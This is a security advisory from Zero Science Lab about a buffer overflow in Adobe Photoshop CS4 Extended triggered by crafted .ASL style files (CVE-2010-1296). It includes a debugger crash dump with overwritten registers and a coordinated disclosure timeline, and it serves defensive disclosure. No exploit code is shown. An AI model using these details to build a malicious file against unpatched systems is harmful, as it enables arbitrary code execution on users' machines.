Summary: The Adobe® Photoshop® family of products is the ultimate playground for
bringing out the best in your digital images, transforming them into anything you
can imagine and showcasing them in extraordinary ways.

Description: Adobe Photoshop CS4 Extended suffers from a buffer overflow vulnerability
when dealing with .ASL (styles) format file. The application failz to sanitize the user
input resulting in a memory corruption, overwriting several memory registers which can
aid the atacker to gain the power of executing arbitrary code or denial of service.

Vendor:
Adobe Systems Incorporated

Product Web Page:
[Only registered and activated users can see links]

Current Version:
CS4 Extended 11.0.0.0

Tested On:
Microsoft Windwos XP Professional SP3 (English)


---------------------------------------------------------------------------

(a34.688): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=00004141 ecx=0000015d edx=41414141 esi=107edea0 edi=107f2000
eip=781807f5 esp=0012dd60 ebp=05620e10 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSVCR80!strncpy+0xa5:
781807f5 8917 mov dword ptr [edi],edx ds:0023:107f2000=????????

---------------------------------------------------------------------------


Vendor Status:
[08.08.2009] Vendor notified.
[10.08.2009] Vendor replied.
[14.08.2009] Asked vendor for confirmation.
[14.08.2009] Vendor confirms vulnerability.
[18.05.2010] Vendor reveals patch release date.
[26.05.2010] Coordinated public disclosure.


Zero Science Lab Advisory ID: ZSL-2010-4938
Advisory: [Only registered and activated users can see links]
Adobe Advisory ID: APSB10-13
Advisory: [Only registered and activated users can see links]
CVE ID: CVE-2010-1296


Vulnerability Discovered By:

Gjoko 'LiquidWorm' Krstic

liquidworm gmail com

Zero Science Lab - [Only registered and activated users can see links]

08.08.2009


*/